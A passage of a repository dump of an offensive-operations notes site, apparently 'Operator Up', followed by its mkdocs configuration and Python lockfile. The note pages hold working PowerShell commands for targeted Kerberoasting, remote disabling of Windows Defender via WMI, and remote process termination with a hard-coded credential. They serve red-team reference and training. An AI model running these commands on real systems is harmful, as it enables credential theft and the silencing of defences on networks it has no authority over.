set an SPN on user account and crack via SPN kerb ticket: 186 | ```powershell 187 | 1. Set-DomainObject -Identity 'user' -set@{serviceprincipalname='blah\blah'} 188 | 2. Invoke-Kerberoast -Identity 'user' -OutputFormat hashcat | fl ==alternative command:== Get-DomainUser -Identity 'user' | Get-DomainSPNTicket 189 | 3. Set-DomainObject -Identity 'user' -Clear serviceprincipalname 190 | ``` -------------------------------------------------------------------------------- /docs/windows/remote_alteration.md: -------------------------------------------------------------------------------- 1 | # Windows Remote Alteration 2 | 3 | ## Powershell Remote Alteration 4 | 5 | ### Disable Defender Remotely using WMI 6 | 7 | ```Powershell 8 | Invoke-WmiMethod -ComputerName 10.0.1.2 -Class Win32_Process -Name Create -ArgumentList "powershell.exe -C `Set-MpPreference -DisableRealtimeMonitoring $true`" 9 | ``` -------------------------------------------------------------------------------- /docs/windows/remote_sa_cmds.md: -------------------------------------------------------------------------------- 1 | # Windows Remote Situational Awareness Commands 2 | 3 | ## WMI Remote Situational Awareness 4 | 5 | ### Remote process listing of machine 6 | 7 | ```powershell 8 | gwmi Win32_Process -ComputerName 43.*.*.5 | % {$name = $_.ProcessName; $ProcessOwner = ($_.GetOwner().User);$ProcID=$_.ProcessId;"$name`t`t$ProcessOwner`t$ProcID"} 9 | ``` 10 | 11 | ## PowerPick Situational Awareness 12 | 13 | ### Remote process lookup by PID and termination via Powerpick WMI with $credential object 14 | 15 | ```powershell 16 | powerpick $credential = New-Object System.Management.Automation.PSCredential ("DA\some",("TestPassword" | ConvertTo-SecureString -AsPlainText -Force)); gwmi Win32_Process -ComputerName -Credential $credential | ?{ $_.ProcessId -match "PID" }.Terminate() 17 | ``` 18 | 19 | ### Remote last boot time listing with PowerPick and $credential object 20 | 21 | ```powershell 22 | powerpick $credential =
New-Object System.Management.Automation.PSCredential ("DA\some",("TestPassword" | ConvertTo-SecureString -AsPlainText -Force)); 23 | gwmi Win32_OperatingSystem -ComputerName -Credential $credential | select __SERVER,@{label='LastRestart';expression={$_.ConvertToDateTime($_.LastBootUpTime}} 24 | ``` -------------------------------------------------------------------------------- /mkdocs.yml: -------------------------------------------------------------------------------- 1 | site_name: Operator Up 2 | site_author: Obscurity Labs LLC. 3 | site_description: Helpful operator notes and techniques in actionable form 4 | site_url: https://obscuritylabs.com/ 5 | 6 | # Copyright 7 | copyright: Copyright © 2020-2020 Obscurity Labs LLC. 8 | 9 | language: en 10 | theme: 11 | name: "material" 12 | palette: 13 | primary: black 14 | accent: red 15 | features: 16 | - instant 17 | - tabs 18 | font: 19 | text: Roboto 20 | code: Roboto Mono 21 | favicon: img/favicon.png 22 | logo: img/logo_transparent_crop.jpg 23 | 24 | extra_css: 25 | - stylesheets/extra.css 26 | 27 | extra: 28 | social: 29 | - icon: fontawesome/brands/github-alt 30 | link: https://github.com/squidfunk 31 | - icon: fontawesome/brands/twitter 32 | link: https://twitter.com/squidfunk 33 | - icon: fontawesome/brands/linkedin 34 | link: https://linkedin.com/in/squidfunk 35 | 36 | # Extensions 37 | markdown_extensions: 38 | - markdown.extensions.admonition 39 | - markdown.extensions.attr_list 40 | - markdown.extensions.codehilite: 41 | guess_lang: false 42 | - markdown.extensions.def_list 43 | - markdown.extensions.footnotes 44 | - markdown.extensions.meta 45 | - markdown.extensions.toc: 46 | permalink: true 47 | - pymdownx.arithmatex 48 | - pymdownx.betterem: 49 | smart_enable: all 50 | - pymdownx.caret 51 | - pymdownx.critic 52 | - pymdownx.details 53 | - pymdownx.emoji: 54 | emoji_index: !!python/name:materialx.emoji.twemoji 55 | emoji_generator: !!python/name:materialx.emoji.to_svg 56 | # - pymdownx.highlight: 57 | # 
linenums_style: pymdownx-inline 58 | - pymdownx.inlinehilite 59 | - pymdownx.keys 60 | - pymdownx.magiclink: 61 | repo_url_shorthand: true 62 | user: squidfunk 63 | repo: mkdocs-material 64 | - pymdownx.mark 65 | - pymdownx.smartsymbols 66 | - pymdownx.snippets: 67 | check_paths: true 68 | - pymdownx.superfences 69 | - pymdownx.tabbed 70 | - pymdownx.tasklist: 71 | custom_checkbox: true 72 | - pymdownx.tilde 73 | 74 | plugins: 75 | - search # necessary for search to work 76 | - minify: 77 | minify_html: true 78 | - git-revision-date-localized: 79 | type: date 80 | 81 | repo_name: obscuritylabs/operator-up 82 | repo_url: https://github.com/obscuritylabs/operator-up 83 | edit_uri: https://github.com/obscuritylabs/operator-up 84 | 85 | # Page tree 86 | nav: 87 | - Home: index.md 88 | - Building: building.md 89 | - Contributing: contributing.md 90 | - License: license.md 91 | - Windows: 92 | - Privilege Escalation: windows/priv_esc.md 93 | - Host Situational Awareness: windows/local_sa_cmds.md 94 | - Remote Situational Awareness: windows/remote_sa_cmds.md 95 | - Network Situational Awareness: windows/network_sa_cmds.md 96 | - Remote Alteration: windows/remote_alteration.md 97 | - Lateral Movement: windows/lat_movement.md 98 | - Persistence: windows/persistence.md 99 | - Collection Operations: windows/collection_operations.md 100 | - Scanning: 101 | - nmap: scanning/nmap.md 102 | - Web Application: 103 | - SQL Injections: web_app/sql_injections.md 104 | - OSINT: 105 | - Email: osint/email.md 106 | - SOC: 107 | - sysmon: soc/sysmon/sysmon.md 108 | 109 | google_analytics: 110 | - UA-64026800-6 111 | - auto 112 | -------------------------------------------------------------------------------- /poetry.lock: -------------------------------------------------------------------------------- 1 | [[package]] 2 | name = "babel" 3 | version = "2.9.1" 4 | description = "Internationalization utilities" 5 | category = "main" 6 | optional = false 7 | python-versions = ">=2.7, !=3.0.*, 
!=3.1.*, !=3.2.*, !=3.3.*" 8 | 9 | [package.dependencies] 10 | pytz = ">=2015.7" 11 | 12 | [[package]] 13 | name = "bracex" 14 | version = "2.2.1" 15 | description = "Bash style brace expander." 16 | category = "main" 17 | optional = false 18 | python-versions = ">=3.6" 19 | 20 | [[package]] 21 | name = "click" 22 | version = "8.0.4" 23 | description = "Composable command line interface toolkit" 24 | category = "main" 25 | optional = false 26 | python-versions = ">=3.6" 27 | 28 | [package.dependencies] 29 | colorama = {version = "*", markers = "platform_system == \"Windows\""} 30 | importlib-metadata = {version = "*", markers = "python_version < \"3.8\""} 31 | 32 | [[package]] 33 | name = "colorama" 34 | version = "0.4.4" 35 | description = "Cross-platform colored terminal text." 36 | category = "main" 37 | optional = false 38 | python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" 39 | 40 | [[package]] 41 | name = "ghp-import" 42 | version = "2.0.2" 43 | description = "Copy your docs directly to the gh-pages branch." 
44 | category = "main" 45 | optional = false 46 | python-versions = "*" 47 | 48 | [package.dependencies] 49 | python-dateutil = ">=2.8.1" 50 | 51 | [package.extras] 52 | dev = ["twine", "markdown", "flake8", "wheel"] 53 | 54 | [[package]] 55 | name = "gitdb" 56 | version = "4.0.9" 57 | description = "Git Object Database" 58 | category = "main" 59 | optional = false 60 | python-versions = ">=3.6" 61 | 62 | [package.dependencies] 63 | smmap = ">=3.0.1,<6" 64 | 65 | [[package]] 66 | name = "gitpython" 67 | version = "3.1.27" 68 | description = "GitPython is a python library used to interact with Git repositories" 69 | category = "main" 70 | optional = false 71 | python-versions = ">=3.7" 72 | 73 | [package.dependencies] 74 | gitdb = ">=4.0.1,<5" 75 | typing-extensions = {version = ">=3.7.4.3", markers = "python_version < \"3.8\""} 76 | 77 | [[package]] 78 | name = "htmlmin" 79 | version = "0.1.12" 80 | description = "An HTML Minifier" 81 | category = "main" 82 | optional = false 83 | python-versions = "*" 84 | 85 | [[package]] 86 | name = "importlib-metadata" 87 | version = "4.11.3" 88 | description = "Read metadata from Python packages" 89 | category = "main" 90 | optional = false 91 | python-versions = ">=3.7" 92 | 93 | [package.dependencies] 94 | typing-extensions = {version = ">=3.6.4", markers = "python_version < \"3.8\""} 95 | zipp = ">=0.5" 96 | 97 | [package.extras] 98 | docs = ["sphinx", "jaraco.packaging (>=9)", "rst.linker (>=1.9)"] 99 | perf = ["ipython"] 100 | testing = ["pytest (>=6)", "pytest-checkdocs (>=2.4)", "pytest-flake8", "pytest-cov", "pytest-enabler (>=1.0.1)", "packaging", "pyfakefs", "flufl.flake8", "pytest-perf (>=0.9.2)", "pytest-black (>=0.3.7)", "pytest-mypy (>=0.9.1)", "importlib-resources (>=1.3)"] 101 | 102 | [[package]] 103 | name = "jinja2" 104 | version = "3.0.3" 105 | description = "A very fast and expressive template engine." 
106 | category = "main" 107 | optional = false 108 | python-versions = ">=3.6" 109 | 110 | [package.dependencies] 111 | MarkupSafe = ">=2.0" 112 | 113 | [package.extras] 114 | i18n = ["Babel (>=2.7)"] 115 | 116 | [[package]] 117 | name = "jsmin" 118 | version = "3.0.1" 119 | description = "JavaScript minifier." 120 | category = "main" 121 | optional = false 122 | python-versions = "*" 123 | 124 | [[package]] 125 | name = "markdown" 126 | version = "3.3.6" 127 | description = "Python implementation of Markdown." 128 | category = "main" 129 | optional = false 130 | python-versions = ">=3.6" 131 | 132 | [package.dependencies] 133 | importlib-metadata = {version = ">=4.4", markers = "python_version < \"3.10\""} 134 | 135 | [package.extras] 136 | testing = ["coverage", "pyyaml"] 137 | 138 | [[package]] 139 | name = "markupsafe" 140 | version = "2.1.0" 141 | description = "Safely add untrusted strings to HTML/XML markup." 142 | category = "main" 143 | optional = false 144 | python-versions = ">=3.7" 145 | 146 | [[package]] 147 | name = "mergedeep" 148 | version = "1.3.4" 149 | description = "A deep merge function for 🐍." 150 | category = "main" 151 | optional = false 152 | python-versions = ">=3.6" 153 | 154 | [[package]] 155 | name = "mkdocs" 156 | version = "1.2.3" 157 | description = "Project documentation with Markdown." 
158 | category = "main" 159 | optional = false 160 | python-versions = ">=3.6" 161 | 162 | [package.dependencies] 163 | click = ">=3.3" 164 | ghp-import = ">=1.0" 165 | importlib-metadata = ">=3.10" 166 | Jinja2 = ">=2.10.1" 167 | Markdown = ">=3.2.1" 168 | mergedeep = ">=1.3.4" 169 | packaging = ">=20.5" 170 | PyYAML = ">=3.10" 171 | pyyaml-env-tag = ">=0.1" 172 | watchdog = ">=2.0" 173 | 174 | [package.extras] 175 | i18n = ["babel (>=2.9.0)"] 176 | 177 | [[package]] 178 | name = "mkdocs-awesome-pages-plugin" 179 | version = "2.7.0" 180 | description = "An MkDocs plugin that simplifies configuring page titles and their order" 181 | category = "main" 182 | optional = false 183 | python-versions = ">=3.6.2" 184 | 185 | [package.dependencies] 186 | mkdocs = ">=1" 187 | wcmatch = ">=7" 188 | 189 | [[package]] 190 | name = "mkdocs-git-revision-date-localized-plugin" 191 | version = "0.5.2" 192 | description = "Mkdocs plugin that enables displaying the localized date of the last git modification of a markdown file." 193 | category = "main" 194 | optional = false 195 | python-versions = ">=3.5" 196 | 197 | [package.dependencies] 198 | babel = ">=2.7.0" 199 | GitPython = "*" 200 | jinja2 = "*" 201 | mkdocs = ">=0.17" 202 | 203 | [[package]] 204 | name = "mkdocs-material" 205 | version = "5.5.14" 206 | description = "A Material Design theme for MkDocs" 207 | category = "main" 208 | optional = false 209 | python-versions = "*" 210 | 211 | [package.dependencies] 212 | markdown = ">=3.2" 213 | mkdocs = ">=1.1" 214 | mkdocs-material-extensions = ">=1.0" 215 | Pygments = ">=2.4" 216 | pymdown-extensions = ">=7.0" 217 | 218 | [[package]] 219 | name = "mkdocs-material-extensions" 220 | version = "1.0.3" 221 | description = "Extension pack for Python Markdown." 
222 | category = "main" 223 | optional = false 224 | python-versions = ">=3.6" 225 | 226 | [[package]] 227 | name = "mkdocs-minify-plugin" 228 | version = "0.3.0" 229 | description = "An MkDocs plugin to minify HTML and/or JS files prior to being written to disk" 230 | category = "main" 231 | optional = false 232 | python-versions = ">=2.7" 233 | 234 | [package.dependencies] 235 | htmlmin = ">=0.1.4" 236 | jsmin = ">=2.2.2" 237 | mkdocs = ">=1.0.4" 238 | 239 | [[package]] 240 | name = "packaging" 241 | version = "21.3" 242 | description = "Core utilities for Python packages" 243 | category = "main" 244 | optional = false 245 | python-versions = ">=3.6" 246 | 247 | [package.dependencies] 248 | pyparsing = ">=2.0.2,<3.0.5 || >3.0.5" 249 | 250 | [[package]] 251 | name = "pygments" 252 | version = "2.11.2" 253 | description = "Pygments is a syntax highlighting package written in Python." 254 | category = "main" 255 | optional = false 256 | python-versions = ">=3.5" 257 | 258 | [[package]] 259 | name = "pymdown-extensions" 260 | version = "9.2" 261 | description = "Extension pack for Python Markdown." 
262 | category = "main" 263 | optional = false 264 | python-versions = ">=3.7" 265 | 266 | [package.dependencies] 267 | Markdown = ">=3.2" 268 | 269 | [[package]] 270 | name = "pyparsing" 271 | version = "3.0.7" 272 | description = "Python parsing module" 273 | category = "main" 274 | optional = false 275 | python-versions = ">=3.6" 276 | 277 | [package.extras] 278 | diagrams = ["jinja2", "railroad-diagrams"] 279 | 280 | [[package]] 281 | name = "python-dateutil" 282 | version = "2.8.2" 283 | description = "Extensions to the standard Python datetime module" 284 | category = "main" 285 | optional = false 286 | python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7" 287 | 288 | [package.dependencies] 289 | six = ">=1.5" 290 | 291 | [[package]] 292 | name = "pytz" 293 | version = "2021.3" 294 | description = "World timezone definitions, modern and historical" 295 | category = "main" 296 | optional = false 297 | python-versions = "*" 298 | 299 | [[package]] 300 | name = "pyyaml" 301 | version = "6.0" 302 | description = "YAML parser and emitter for Python" 303 | category = "main" 304 | optional = false 305 | python-versions = ">=3.6" 306 | 307 | [[package]] 308 | name = "pyyaml-env-tag" 309 | version = "0.1" 310 | description = "A custom YAML tag for referencing environment variables in YAML files. 
" 311 | category = "main" 312 | optional = false 313 | python-versions = ">=3.6" 314 | 315 | [package.dependencies] 316 | pyyaml = "*" 317 | 318 | [[package]] 319 | name = "six" 320 | version = "1.16.0" 321 | description = "Python 2 and 3 compatibility utilities" 322 | category = "main" 323 | optional = false 324 | python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*" 325 | 326 | [[package]] 327 | name = "smmap" 328 | version = "5.0.0" 329 | description = "A pure Python implementation of a sliding window memory map manager" 330 | category = "main" 331 | optional = false 332 | python-versions = ">=3.6" 333 | 334 | [[package]] 335 | name = "typing-extensions" 336 | version = "4.1.1" 337 | description = "Backported and Experimental Type Hints for Python 3.6+" 338 | category = "main" 339 | optional = false 340 | python-versions = ">=3.6" 341 | 342 | [[package]] 343 | name = "watchdog" 344 | version = "2.1.6" 345 | description = "Filesystem events monitoring" 346 | category = "main" 347 | optional = false 348 | python-versions = ">=3.6" 349 | 350 | [package.extras] 351 | watchmedo = ["PyYAML (>=3.10)"] 352 | 353 | [[package]] 354 | name = "wcmatch" 355 | version = "8.3" 356 | description = "Wildcard/glob file name matcher." 
357 | category = "main" 358 | optional = false 359 | python-versions = ">=3.6" 360 | 361 | [package.dependencies] 362 | bracex = ">=2.1.1" 363 | 364 | [[package]] 365 | name = "zipp" 366 | version = "3.7.0" 367 | description = "Backport of pathlib-compatible object wrapper for zip files" 368 | category = "main" 369 | optional = false 370 | python-versions = ">=3.7" 371 | 372 | [package.extras] 373 | docs = ["sphinx", "jaraco.packaging (>=8.2)", "rst.linker (>=1.9)"] 374 | testing = ["pytest (>=6)", "pytest-checkdocs (>=2.4)", "pytest-flake8", "pytest-cov", "pytest-enabler (>=1.0.1)", "jaraco.itertools", "func-timeout", "pytest-black (>=0.3.7)", "pytest-mypy"] 375 | 376 | [metadata] 377 | lock-version = "1.1" 378 | python-versions = "^3.7" 379 | content-hash = "b8f2d0fba8070df32ecdaba28f283cf7bcab2da2c69ba0e7cfda5be44b868632" 380 | 381 | [metadata.files] 382 | babel = [ 383 | {file = "Babel-2.9.1-py2.py3-none-any.whl", hash = "sha256:ab49e12b91d937cd11f0b67cb259a57ab4ad2b59ac7a3b41d6c06c0ac5b0def9"}, 384 | {file = "Babel-2.9.1.tar.gz", hash = "sha256:bc0c176f9f6a994582230df350aa6e05ba2ebe4b3ac317eab29d9be5d2768da0"}, 385 | ] 386 | bracex = [ 387 | {file = "bracex-2.2.1-py3-none-any.whl", hash = "sha256:096c4b788bf492f7af4e90ef8b5bcbfb99759ae3415ea1b83c9d29a5ed8f9a94"}, 388 | {file = "bracex-2.2.1.tar.gz", hash = "sha256:1c8d1296e00ad9a91030ccb4c291f9e4dc7c054f12c707ba3c5ff3e9a81bcd21"}, 389 | ] 390 | click = [ 391 | {file = "click-8.0.4-py3-none-any.whl", hash = "sha256:6a7a62563bbfabfda3a38f3023a1db4a35978c0abd76f6c9605ecd6554d6d9b1"}, 392 | {file = "click-8.0.4.tar.gz", hash = "sha256:8458d7b1287c5fb128c90e23381cf99dcde74beaf6c7ff6384ce84d6fe090adb"}, 393 | ] 394 | colorama = [ 395 | {file = "colorama-0.4.4-py2.py3-none-any.whl", hash = "sha256:9f47eda37229f68eee03b24b9748937c7dc3868f906e8ba69fbcbdd3bc5dc3e2"}, 396 | {file = "colorama-0.4.4.tar.gz", hash = "sha256:5941b2b48a20143d2267e95b1c2a7603ce057ee39fd88e7329b0c292aa16869b"}, 397 | ] 398 | ghp-import = [ 399 
| {file = "ghp-import-2.0.2.tar.gz", hash = "sha256:947b3771f11be850c852c64b561c600fdddf794bab363060854c1ee7ad05e071"}, 400 | {file = "ghp_import-2.0.2-py3-none-any.whl", hash = "sha256:5f8962b30b20652cdffa9c5a9812f7de6bcb56ec475acac579807719bf242c46"}, 401 | ] 402 | gitdb = [ 403 | {file = "gitdb-4.0.9-py3-none-any.whl", hash = "sha256:8033ad4e853066ba6ca92050b9df2f89301b8fc8bf7e9324d412a63f8bf1a8fd"}, 404 | {file = "gitdb-4.0.9.tar.gz", hash = "sha256:bac2fd45c0a1c9cf619e63a90d62bdc63892ef92387424b855792a6cabe789aa"}, 405 | ] 406 | gitpython = [ 407 | {file = "GitPython-3.1.27-py3-none-any.whl", hash = "sha256:5b68b000463593e05ff2b261acff0ff0972df8ab1b70d3cdbd41b546c8b8fc3d"}, 408 | {file = "GitPython-3.1.27.tar.gz", hash = "sha256:1c885ce809e8ba2d88a29befeb385fcea06338d3640712b59ca623c220bb5704"}, 409 | ] 410 | htmlmin = [ 411 | {file = "htmlmin-0.1.12.tar.gz", hash = "sha256:50c1ef4630374a5d723900096a961cff426dff46b48f34d194a81bbe14eca178"}, 412 | ] 413 | importlib-metadata = [ 414 | {file = "importlib_metadata-4.11.3-py3-none-any.whl", hash = "sha256:1208431ca90a8cca1a6b8af391bb53c1a2db74e5d1cef6ddced95d4b2062edc6"}, 415 | {file = "importlib_metadata-4.11.3.tar.gz", hash = "sha256:ea4c597ebf37142f827b8f39299579e31685c31d3a438b59f469406afd0f2539"}, 416 | ] 417 | jinja2 = [ 418 | {file = "Jinja2-3.0.3-py3-none-any.whl", hash = "sha256:077ce6014f7b40d03b47d1f1ca4b0fc8328a692bd284016f806ed0eaca390ad8"}, 419 | {file = "Jinja2-3.0.3.tar.gz", hash = "sha256:611bb273cd68f3b993fabdc4064fc858c5b47a973cb5aa7999ec1ba405c87cd7"}, 420 | ] 421 | jsmin = [ 422 | {file = "jsmin-3.0.1.tar.gz", hash = "sha256:c0959a121ef94542e807a674142606f7e90214a2b3d1eb17300244bbb5cc2bfc"}, 423 | ] 424 | markdown = [ 425 | {file = "Markdown-3.3.6-py3-none-any.whl", hash = "sha256:9923332318f843411e9932237530df53162e29dc7a4e2b91e35764583c46c9a3"}, 426 | {file = "Markdown-3.3.6.tar.gz", hash = "sha256:76df8ae32294ec39dcf89340382882dfa12975f87f45c3ed1ecdb1e8cefc7006"}, 427 | ] 428 | markupsafe = 
[ 429 | {file = "MarkupSafe-2.1.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:3028252424c72b2602a323f70fbf50aa80a5d3aa616ea6add4ba21ae9cc9da4c"}, 430 | {file = "MarkupSafe-2.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:290b02bab3c9e216da57c1d11d2ba73a9f73a614bbdcc027d299a60cdfabb11a"}, 431 | {file = "MarkupSafe-2.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6e104c0c2b4cd765b4e83909cde7ec61a1e313f8a75775897db321450e928cce"}, 432 | {file = "MarkupSafe-2.1.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:24c3be29abb6b34052fd26fc7a8e0a49b1ee9d282e3665e8ad09a0a68faee5b3"}, 433 | {file = "MarkupSafe-2.1.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:204730fd5fe2fe3b1e9ccadb2bd18ba8712b111dcabce185af0b3b5285a7c989"}, 434 | {file = "MarkupSafe-2.1.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:d3b64c65328cb4cd252c94f83e66e3d7acf8891e60ebf588d7b493a55a1dbf26"}, 435 | {file = "MarkupSafe-2.1.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:96de1932237abe0a13ba68b63e94113678c379dca45afa040a17b6e1ad7ed076"}, 436 | {file = "MarkupSafe-2.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:75bb36f134883fdbe13d8e63b8675f5f12b80bb6627f7714c7d6c5becf22719f"}, 437 | {file = "MarkupSafe-2.1.0-cp310-cp310-win32.whl", hash = "sha256:4056f752015dfa9828dce3140dbadd543b555afb3252507348c493def166d454"}, 438 | {file = "MarkupSafe-2.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:d4e702eea4a2903441f2735799d217f4ac1b55f7d8ad96ab7d4e25417cb0827c"}, 439 | {file = "MarkupSafe-2.1.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:f0eddfcabd6936558ec020130f932d479930581171368fd728efcfb6ef0dd357"}, 440 | {file = "MarkupSafe-2.1.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5ddea4c352a488b5e1069069f2f501006b1a4362cb906bee9a193ef1245a7a61"}, 441 | {file = 
"MarkupSafe-2.1.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:09c86c9643cceb1d87ca08cdc30160d1b7ab49a8a21564868921959bd16441b8"}, 442 | {file = "MarkupSafe-2.1.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a0a0abef2ca47b33fb615b491ce31b055ef2430de52c5b3fb19a4042dbc5cadb"}, 443 | {file = "MarkupSafe-2.1.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:736895a020e31b428b3382a7887bfea96102c529530299f426bf2e636aacec9e"}, 444 | {file = "MarkupSafe-2.1.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:679cbb78914ab212c49c67ba2c7396dc599a8479de51b9a87b174700abd9ea49"}, 445 | {file = "MarkupSafe-2.1.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:84ad5e29bf8bab3ad70fd707d3c05524862bddc54dc040982b0dbcff36481de7"}, 446 | {file = "MarkupSafe-2.1.0-cp37-cp37m-win32.whl", hash = "sha256:8da5924cb1f9064589767b0f3fc39d03e3d0fb5aa29e0cb21d43106519bd624a"}, 447 | {file = "MarkupSafe-2.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:454ffc1cbb75227d15667c09f164a0099159da0c1f3d2636aa648f12675491ad"}, 448 | {file = "MarkupSafe-2.1.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:142119fb14a1ef6d758912b25c4e803c3ff66920635c44078666fe7cc3f8f759"}, 449 | {file = "MarkupSafe-2.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b2a5a856019d2833c56a3dcac1b80fe795c95f401818ea963594b345929dffa7"}, 450 | {file = "MarkupSafe-2.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1d1fb9b2eec3c9714dd936860850300b51dbaa37404209c8d4cb66547884b7ed"}, 451 | {file = "MarkupSafe-2.1.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:62c0285e91414f5c8f621a17b69fc0088394ccdaa961ef469e833dbff64bd5ea"}, 452 | {file = "MarkupSafe-2.1.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fc3150f85e2dbcf99e65238c842d1cfe69d3e7649b19864c1cc043213d9cd730"}, 453 | {file = 
"MarkupSafe-2.1.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:f02cf7221d5cd915d7fa58ab64f7ee6dd0f6cddbb48683debf5d04ae9b1c2cc1"}, 454 | {file = "MarkupSafe-2.1.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:d5653619b3eb5cbd35bfba3c12d575db2a74d15e0e1c08bf1db788069d410ce8"}, 455 | {file = "MarkupSafe-2.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:7d2f5d97fcbd004c03df8d8fe2b973fe2b14e7bfeb2cfa012eaa8759ce9a762f"}, 456 | {file = "MarkupSafe-2.1.0-cp38-cp38-win32.whl", hash = "sha256:3cace1837bc84e63b3fd2dfce37f08f8c18aeb81ef5cf6bb9b51f625cb4e6cd8"}, 457 | {file = "MarkupSafe-2.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:fabbe18087c3d33c5824cb145ffca52eccd053061df1d79d4b66dafa5ad2a5ea"}, 458 | {file = "MarkupSafe-2.1.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:023af8c54fe63530545f70dd2a2a7eed18d07a9a77b94e8bf1e2ff7f252db9a3"}, 459 | {file = "MarkupSafe-2.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d66624f04de4af8bbf1c7f21cc06649c1c69a7f84109179add573ce35e46d448"}, 460 | {file = "MarkupSafe-2.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c532d5ab79be0199fa2658e24a02fce8542df196e60665dd322409a03db6a52c"}, 461 | {file = "MarkupSafe-2.1.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e67ec74fada3841b8c5f4c4f197bea916025cb9aa3fe5abf7d52b655d042f956"}, 462 | {file = "MarkupSafe-2.1.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:30c653fde75a6e5eb814d2a0a89378f83d1d3f502ab710904ee585c38888816c"}, 463 | {file = "MarkupSafe-2.1.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:961eb86e5be7d0973789f30ebcf6caab60b844203f4396ece27310295a6082c7"}, 464 | {file = "MarkupSafe-2.1.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:598b65d74615c021423bd45c2bc5e9b59539c875a9bdb7e5f2a6b92dfcfc268d"}, 465 | {file = "MarkupSafe-2.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = 
"sha256:599941da468f2cf22bf90a84f6e2a65524e87be2fce844f96f2dd9a6c9d1e635"}, 466 | {file = "MarkupSafe-2.1.0-cp39-cp39-win32.whl", hash = "sha256:e6f7f3f41faffaea6596da86ecc2389672fa949bd035251eab26dc6697451d05"}, 467 | {file = "MarkupSafe-2.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:b8811d48078d1cf2a6863dafb896e68406c5f513048451cd2ded0473133473c7"}, 468 | {file = "MarkupSafe-2.1.0.tar.gz", hash = "sha256:80beaf63ddfbc64a0452b841d8036ca0611e049650e20afcb882f5d3c266d65f"}, 469 | ] 470 | mergedeep = [ 471 | {file = "mergedeep-1.3.4-py3-none-any.whl", hash = "sha256:70775750742b25c0d8f36c55aed03d24c3384d17c951b3175d898bd778ef0307"}, 472 | {file = "mergedeep-1.3.4.tar.gz", hash = "sha256:0096d52e9dad9939c3d975a774666af186eda617e6ca84df4c94dec30004f2a8"}, 473 | ] 474 | mkdocs = [ 475 | {file = "mkdocs-1.2.3-py3-none-any.whl", hash = "sha256:a1fa8c2d0c1305d7fc2b9d9f607c71778572a8b110fb26642aa00296c9e6d072"}, 476 | {file = "mkdocs-1.2.3.tar.gz", hash = "sha256:89f5a094764381cda656af4298727c9f53dc3e602983087e1fe96ea1df24f4c1"}, 477 | ] 478 | mkdocs-awesome-pages-plugin = [ 479 | {file = "mkdocs-awesome-pages-plugin-2.7.0.tar.gz", hash = "sha256:f0fb3cc8ccfd9ca904b8c6db0a0cbec24d0ff3f76540bfe063dc173b30f8d4a8"}, 480 | {file = "mkdocs_awesome_pages_plugin-2.7.0-py3-none-any.whl", hash = "sha256:875ae2b1a1a782a40ceb6fb8a5f2e83ffb15e6bdca29c597a4decb6bdd76e066"}, 481 | ] 482 | mkdocs-git-revision-date-localized-plugin = [ 483 | {file = "mkdocs-git-revision-date-localized-plugin-0.5.2.tar.gz", hash = "sha256:9a5f4f0f9de298af7c11f749822b9396d83c7920369ccd868d9cf035a627021f"}, 484 | {file = "mkdocs_git_revision_date_localized_plugin-0.5.2-py3-none-any.whl", hash = "sha256:3a109a2edd47cf2f80f60a272c88077ede4a88d25a46d9bdf276014bdbc3a14a"}, 485 | ] 486 | mkdocs-material = [ 487 | {file = "mkdocs-material-5.5.14.tar.gz", hash = "sha256:9f3237df1a72f91e0330a5e3b3711cb7aaa0d5705f9585e6ce6fbacaa16e777f"}, 488 | {file = "mkdocs_material-5.5.14-py2.py3-none-any.whl", hash = 
